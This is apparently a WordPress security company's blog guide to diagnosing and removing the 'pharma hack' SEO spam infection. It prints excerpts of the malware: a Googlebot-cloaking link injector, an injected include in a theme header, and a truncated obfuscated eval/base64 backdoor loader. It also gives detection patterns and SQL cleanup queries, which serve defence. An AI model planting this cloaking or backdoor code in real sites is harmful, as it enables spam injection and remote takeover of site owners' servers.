WordPress Pharma Hack

Is your wordpress site littered with pharma links?

Is your index.php files infected with pharma hack?

Key Takeaways

• Understanding the Threat: The WordPress Pharma Hack is a deceptive infiltration that displays spam content to search engines, affecting your site’s SEO.
• Common Symptoms: Unexpected advertisements for pharmaceutical products, especially when viewed via search engine results.
• Detection: Regularly monitor your website for unexpected changes, especially in content and SEO rankings.
• Prevention: Always keep your WordPress core, themes, and plugins updated. Use reliable security plugins and regularly scan for vulnerabilities.
• Removal:
  • Database Cleanup: Search for suspicious content in the WordPress database, especially in posts and comments.
  • Files Inspection: Check the core files, themes, and plugins for any malicious injections or unfamiliar code.
  • User Roles: Ensure no unauthorized WordPress users or suspicious admin roles.
• Post-Hack Actions: Change all passwords, ensure proper file permissions, and consider using a website firewall.
• While exact numbers vary, many WordPress sites are vulnerable to such hacks due to outdated plugins or themes. Regular maintenance and monitoring can prevent a majority of these infiltrations.

WordPress has become one of the most popular Content Management Systems (CMS) in use in 2024. It is estimated that more than 17% of all websites on the internet that use WordPress are infected with some of malware. While security issues are a part of this type of application, many steps are taken to ensure that WordPress is as secure as possible. It is a very notorious, self regenerating hack which can infect any wordpress site and may lead to negative consequences. Usually, in this kind of hack, users coming from search engines are sent to a pharma spam page (see example below).

Pharma hack has evolved a lot in 2024 and so the steps to fix it.

A few weeks ago, we received a request for Cleaning Pharma Hack in WordPress pages from one of our clients. While diagnosing their site, our WordPress experts encountered that the search results for the website looked more like a pharmacy business site than a helpful Web resource. This black hat seo exploit was destroying their SEO rankings by targeting the Google SERPs, due to which their website was blacklisted by Google and started showing  ““This Site May Be Hacked” message in Google.

In this article you will learn more about What is WordPress pharma hack? & how to find and remove Pharma Hack from wordpress site by cleaning up the database and infected files. 

???? What is A Pharma Hack – Meaning

WordPress Pharma Hack also known as Google Viagra hack is a kind of website spam hack that injects spam into WordPress pages and search engine results not visible to the normal user. The spam only shows up if the user agent is from Google’s crawler (Googlebot). Also, the infection is a bit tricky to remove and if not done properly will keep on regenerating. Basically, pharma hack is an exploit that takes advantage of vulnerabilities in WordPress. The attacker exploits vulnerable WP websites to distribute pharmaceutical content to search engines and the website visitors. These attacks most often target search engines like Google or Bing in an attempt to increase traffic to illegal pharmaceutical businesses.

This hack quietly exploits your highest-ranking and most valuable pages by overriding the title tag and by inserting spam links into the page content. These modified title tag and spam links are only visible to search engines and it is often done via cloaking. In 2018-19, we have seen increased instances of this kind of hack on WordPress sites as compared to 2017.

Lets understand it the other way, There are several drugs like Viagra, Nexium, Cialis which are banned on the internet that means they are restricted from being promoted or sold over the web. Therefore some pharmaceutical companies try out illegal methods of promoting their products. Pharma hack is one of them and has devastating impact on the compromised website.

This web exploit is categorised under blackhat SEO spam and is mostly targeted towards small business websites. Other hacks which come under same category includes: Gibberish Keywords Hack, Japanese Keywords Spam & WordPress malware redirect.

The below is a cached version of an infected page.

Google SERP results produced by a pharma hack example:

Regenerating Spam Doorway – Examples

Shockingly in one of the WordPress sites, a malicious wp-page.php was sighted which was creating auto-generated pharma spam doorways. On being discovered, this file was immediately located and deleted. When we opened that wp-page.php in a browser to verify that the problem was resolved , malicious content was still present though it was not a cached page as per header information.

On a thorough examination, wp-page.php was still present with the current modification record. It was discovered that this file tended to recreate itself even after getting deleted. Such a tendency resonates with malware using cronjobs to reinfect sites. Surprisingly, the user’s crontab data did not show any signs of suspicious cron jobs.

Still further scan of server revealed presence of malicious nav.php file which was responsible for creating wp-page.php file and also injecting malicious wp-page.php links into clean site pages when fetched by Googlebot or Bingbot.

...$movedb = user_min_browser($_SERVER['HTTP_USER_AGENT']);$movedb2 = 'moved';if ($movedb == $movedb2){ echo '<ul>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'</a></li>';echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'</a></li>';...echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'</a></li>';echo '</ul>';}

Now, the moot question was to find out how did nav.php file gets launched since it was not part of the theme. This inclusion of file was also done in the header.php of the same theme.

With a malicious code, the hacker provided reference to nav.php file in the header.php so that the malicious code executes immediately a public site page loaded.

Quick scan for nav.php revealed this code in the header.php of the theme :

<?php include 'nav.php'; ?>

The coding was done to facilitate the injection of spam to search engine crawlers and also to recreate the wp-page.php every time a public site page is loaded. This strategy was used as “delete protection” of the wp-page.php file.

The crux of the case is that the website does not get secured just by casual scanning and removing malicious content, an in-depth scan has to be done to ensure that the site is bug-free. This also has to be ensured that the site is continuously monitored to fix any cron jobs, backdoors, security holes, etc. which will help the website owner to keep at bay from present and future hacker and their harmful strategies. The website owner needs to deploy a robust and foolproof security monitoring system that will ensure that any malicious code executed into the server is addressed immediately.

⭐ Diagnosing SEO Pharma Hack

Purpose Of Google Pharma Hack

Many drugs like Viagra, Nexium, Cialis, are banned which means they are restricted from being promoted on websites. Therefore some pharmaceutical companies try out illegal methods of promoting their products.

Pharma hack causes search engines to return ads for pharmaceutical products along with legitimate listings. The hack can be difficult to detect because it does not affect the displayed pages of the compromised Website or blog. The aim of this hack is to gain valuable links from high-ranking pages.

Because of this behavior, many sites have been compromised for months with those spam keywords which aren’t noticed by anyone.

Diagnosing and finding pharma hack is another important task which needs to be done with proper accuracy and it needs expertise. A quick way to check if your site is compromised is by searching on Google for “inurl:yoursite.com cheap viagra or cheap cialis” or using our free wordpress security scanner.

When we say that the spam links and content isn’t visible to users, we mean that a normal user will see this in the Google search results. The description beneath the link to the website will show something related to the pharmaceutical products from the hacker’s site.

Even if you are the admin of the site and look through the HTML source code, you won’t find the spam links or content. This is because the malicious content is disguised and placed in your WordPress blog’s plugin folders, and in your database.

Since this exploit only targets the highest ranking pages and not all the pages on the site, it becomes more difficult to find.

How To Check If Your Site Is Hacked?

Wondering about How To Tell If Your Site is Hacked with The Pharma Hack, Well, this is one of the most important step of removing pharma hack spam from your WordPress website. Go through the below mentioned ways in order to identify the infection.

1. Use a scanner

You can use free malware scanners for scanning your website. We have also developed our own tool specifically for this purpose.

2. See what Google sees

• This compares with how Google identifies itself. When Google visits your website to retrieve your pages it identifies itself using one of the following ‘strings’ of text:
  Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
  Googlebot/2.1 (+http://www.googlebot.com/bot.html)
  Googlebot/2.1 (+http://www.google.com/bot.html)
  You need to use a tool that has its user-agent string set to look like Googlebot’s user agent string.

We recommend the User-Agent Switcher tool .

For Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher/dbclpoekepcmadpkeaelmhiheolhjflj?hl=en

For Firefox :https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

Now retrieve one or more of the pages of your site and look for anything ‘different’ or out of place.If nothing is immediately apparent – view the source of your pages.

Usually this option is available by right clicking in the page and selecting ‘View source’ from the context sensitive popup menu. If the option isn’t there – try right clicking on a different (empty) part of the page.

In particular check the following areas of the page’s
– check the text between the two tags – look for any words that don’t belong
– look at the text between the quotes following the content= part of the meta description text
By now you have either found something or you haven’t.

One final check is to search this html source code for a select few words that should not ordinarily be found within the page.

• For pharma hack, search for words such as: Viagra, Cialis or Regalis

3. Use Webmaster Tools

You can use the ‘Fetch as Googlebot’ option within Google Webmaster Tools. Check the output code after the page is fetched and rendered.

4. Search in Google

The ‘site:’ operator is a handy way of telling Google to only show results from specific sites. For best results use

• site:yourdomain.com
• or, site:yourdomain.com viagra
• For advanced use you could use a group of words within brackets/parentheses

site:yourdomain.com (viagra|cialis|regalis|payday|blackjack|holdem|porn)

Why Is It Hard To Remove Pharma Hack?

In a pharma hack, the backdoors keep regenerating every time we remove them. Therefore, If the backdoors are regenerating, this might be due to malware that uses cron jobs to reinfect sites, so check the user’s crontab.

If you don’t find any cron job there,the hacker must have injected a backdoor which is leading to the recreation of infection on the website. To Identify the Regenerating Script check out if the file content was adding wp-page.php to legitimate site pages whenever a request was made by Googlebot or Bingbot.

Appending wp-page.php to legitimate requests isn’t the real problem;  the actual problem is the regeneration of the file. For those unfamiliar with how themes work, if any include is added in the header file, it keeps loading the wp-page.php file every time the theme will be loaded by the visitors.

The ???? hacker injected this line into header.php to make the malicious code execute every time a public website page was requested. This is mainly done to send the spam to search engine crawlers, but it also recreates the wp-page.php as a “delete protection” feature.

⭐ How does Pharma hack works?

Basically, the hack consists of two parts—malicious files in the WordPress plugins folder coupled with encrypted code in the WordPress database. The files in the plugins folder contain code that runs the encrypted code stored in the database. Because of this, the pharma hack is dependent upon these rogue files in the plugins folder.

Typically, hack files contain easily-identifiable PHP functions like eval() and base64_decode(), and although the pharma hack is no exception, there’s one major difference. With the pharma hack, these functions are stored in the WordPress database as strings, and they’re encoded backwards! At runtime, a hack file in the plugins folder pulls these strings from the database, flips ’em, and then runs ’em as functions, and that’s how the deed gets done.

???? Also Read – How To Fix eval(base64_decode()) Php Hack in WordPress [Guide]

Most of the time, malicious content ( in the form of code) is encoded to look like legitimate WordPress files and are injected to the plugin folder.If there are any files other than the default files available with your original WordPress plugin install should be looked at closely, since they could be hack files.

The malicious code sends Google with requests for the list of highest ranking pages on your website. It then stores this information in its database, and targets them when it runs.

The pharma hack has various undetectable WordPress backdoors that let the hacker regain the access to your website:

• Backdoor that allows the attackers to insert files.
• Backdoor inside one (or more) plugins to insert the spam.
• Backdoor inside the database used by the plugins.

If you fix one of the three, but forget about the rest, you’ll most likely be reinfected and the spam will continue to be indexed.

???? Also Read – WordPress Brute Force Attack Prevention

• Backdoor Inserted into Files

Generally, attackers hunt for vulnerable WordPress installations i.e sites using an old version of WordPress, vulnerable plugins, and themes, security loopholes or hosting multiple websites on the same account using free wordpress scanners. This leads to the very first step to inject the backdoors into a compromised site.

When the backdoor is added, it is not immediately executed. Sometimes it stays for months without even getting called. The common places for these backdoors are:

wp-content/uploads/.*php (random PHP name file)
 wp-includes/images/smilies/icon_smile_old.php.xl
 wp-includes/wp-db-class.php
 wp-includes/images/wp-img.php

???? Also Read – How to Scan Malware in WordPress Themes

In the pharma attack, these files have backdoor in the form of following piece of code:

< ? php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';$joEDdb
 ='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;@$ygDOEJ(@$j
 oEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY... (long long string)..

However,  it is still calling eval(base64_decode but it is using variables that makes it hard to detect. In fact, none of the WordPress security plugins are able to find it. Therefore, look for such a string in your WordPress folders:

php $[a-zA-Z]*=’as’; 

If you do an inspection of the code, you will see that it scans for the wp-config.php file and gets the database information. Hence, it will act as a remote shell and retrieves a lot of information about the system. That’s the first thing you have to remove before you do anything else.

If you don’t, you may allow hackers to reinfect your site via a backdoor or unpatched security hole. Reinfection may happen within seconds or it may take days before the malware returns, causing another stressful situation.

As always, we recommend you to update your WordPress instance to the latest version. This goes for all of your plugins, themes, etc. WordPress is typically very secure, it’s when you’re running old versions and out of date plugins/themes that run into trouble.

???? Also Read – How to Backup WordPress Database Manually?

For WordPress site owners, there are several reliable free WordPress security plugins that monitor the integrity of core files and theme files. But if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, know that we’re here to help.☎️

• Backdoor Inside Plugins or themes

Now the next step of the attack is targeting compromised plugins and themes, that’s why WordPress Theme Security is very much important.. After successfully creating a backdoor into the system, a file will be created inside one of the existing plugins. Example:

akismet/wp-akismet.php
 akismet/db-akismet.php
 wp-pagenavi/db-pagenavi.php
 wp-pagenavi/class-pagenavi.php
 podpress/ext-podpess.php
 tweetmeme/ext-tweetmeme.php
 excerpt-editor/db-editor.php
 akismet/.akismet.cache.php
 akismet/.akismet.bak.php
 tweetmeme/.tweetmem.old.php

They will target one or more old plugins using names like

wp-[plugin].php, 
db-[plugin].php, 
ext-[plugin].php, etc. 

Look for for any plugin file with the wp_class_support string on it.

$ grep -r "wp_class_support" ./wp-content/plugins

Make sure you remove all those files and if required, remove all such plugins. To be 100% sure your plugins are clean, I would recommend removing all of them and reinstall again. (not possible for all sites, but this is probably the most secure way of doing it). Always keep them updated. ???? Also Read – WordPress .htaccess hacked – Cleanup & Prevention

• Backdoor Inside the Database

This is the last step, and equally important. This is where the spam itself is hidden. They have been using the wp_options table with these names in the option_name:

 wp-options -> class_generic_support
 wp-options -> widget_generic_support
 wp-options -> wp_check_hash
 wp-options -> rss_7988287cd8f4f531c6b94fbdbc4e1caf
 wp-options -> rss_d77ee8bfba87fa91cd91469a5ba5abea
 wp-options -> rss_552afe0001e673901a9f2caebdd3141d

So, you need to clean these SQL queries from your database:

delete from wp_options where option_name = 'class_generic_support';
 delete from wp_options where option_name = 'widget_generic_support';
 delete from wp_options where option_name = 'fwp';
 delete from wp_options where option_name = 'wp_check_hash';
 delete from wp_options where option_name = 'ftp_credentials';
 delete from wp_options where option_name = 'rss_7988287cd8f4f531c6b94fbdbc4e1caf';
 delete from wp_options where option_name = 'rss_d77ee8bfba87fa91cd91469a5ba5abea';
 delete from wp_options where option_name = 'rss_552afe0001e673901a9f2caebdd3141d';

⭐ How To Remove Pharma Hack From WordPress site?

Go through the steps given below in order to cleanse your site and ‘Remove pharma hack spam from wordpress website’.

There are two ways to clean pharma hack files from your WordPress website:

1. Manual Clean Up
   • Removing File from the Plugin Directory
   • Removing Database Entries.
2. Security Service

Manual Cleanup:

While manually cleaning files, you are making changes to your WordPress files. Unless you are a skilled developer, we’d  urge you don’t choose manual removal of this hack. But if you have an experience with handling WordPress files and database, follow this procedure:

The manual WordPress pharma hack cleanup include two basic steps:

1. Removing File from the Plugin Directory
2. Removing Database Entries.

Removing File from the Plugin Directory:

Firstly login to your web host and go to a page called cPanel. There you should find an option for File Manager. Select the File Manager.

2. You should find a folder called public_html on the left side of the File Manager. When you select this folder, a dropdown will open with three main files of your WordPress:

• Wp-admin
• Wp-content
• Wp-includes

3. Among these three files, choose wp-content. On selecting iw will display a dropdown list of internal files. Here you will find the plugins folder.,

This folder includes files of all the plugins installed in your WordPress site. The reason we recommend this particular folder to start with is because the plugins are the outdated plugins are the easiest targets to inject compromised files and thus hack a website.

4. To identify malicious files, check out the default files present in each plugin so that you can easily identify the suspicious files. To know the default files, go to the cPanel. Click on File Manager. A popup will appear where you’ll have to select ‘Show Hidden Files.’

5. If you find any file that is not a default file, delete those malicious files. With this we complete the first step. Now, let’s move to the second step.

Removing The Entries From Database:

Now, again go back to the cPanel. There you should find an option for phpMyAdmin. Open that folder.

In the database, select the wp_options table. It will allow you to browse through the table content. In the wp_options table, you’ll need to search for the following database entries:

class_generic_support 
 wp_check_hash 
 ftp_credentials 
 widget_generic_support 
 fwp 
 rss_% (Delete all matches to rss_ expect, rss_excerpt_length, and rss_language) 

Delete all those entries using this piece of code. And that’s it. Your site is now hack free. Before this, make sure you have taken full WordPress database backup and must know how to export WordPress database.

Take Expert Help

If you are unaware of how to handles wordpress files, using a security service is ideal. At Wp Hacked help you’d have to raise a ticket to clean your hacker site. Wp Hacked help is one of the best WordPress security services in the market that allows you to clean your site at the click of a button. Therefore, if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, just write to us.

⭐Post Clean Up Steps:

Never skip these post pharma hack cleanup steps in order to  reduce the risk of a reinfection and ensure that your website remains clean:

• Enable the website Firewall – WAF:

Enabling a valuable network security measure places a set of rules on incoming and outgoing traffic in order to protect networks, servers, websites, and individual computers. This website firewall acts as a wall between a trusted source (say, the server your WordPress website is hosted on) and an untrusted source (the internet) in which only trusted data is allowed entry.

???? Virtual Hardening & WAF ????️ How Does It Hardens WordPress?

• Keep Updating Your Website:

If you are using WordPress, keep updating it to the latest version. Why? Because out-of-date software is the leading cause of infections. This also includes your plugins, themes, and any other extension type.

• Change your passwords:

It is prudent to change the passwords related to your website: FTP, SFTP, cPanel, Plesk, WP-admin, etc. They could have been compromised and we do not want you to be reinfected because the attackers can still come back in through them.  We recommend that you use a Password Manager, so you do not have to remember them all in your head.

???? How To Change Your Default WordPress Username password?

• Update your database password:

Also, update the password of your database. Keep a strong, unique and hard-to-guess password. Make sure you don’t use your name, spouse name or date of birth as the password for an integral part of your website. If you’re not familiar with handling changes in your database and configuration files, read our article.

• Run an antivirus on your system:

In a lot of cases, we see that websites are compromised due to desktop malware that steals credentials. It’s why we always ask you take a minute to run an antivirus product.

???? How To Remove Malware From WordPress Site

• Backup Your Visit:

After the site is clean and secure, a very good practice is to do regular backups. It reduces the chances of damage or risk of data loss to your website. Make sure to go through this WordPress site maintenance checklist to ensure smooth sailing.

For the most part, WordPress has been pretty solid in the security department. Security flaws are almost inevitable, but they’re usually caught early in the development stage. The fact is that when a malicious actor wants to infiltrate your website and he’s good enough at his craft, he’s probably going to succeed.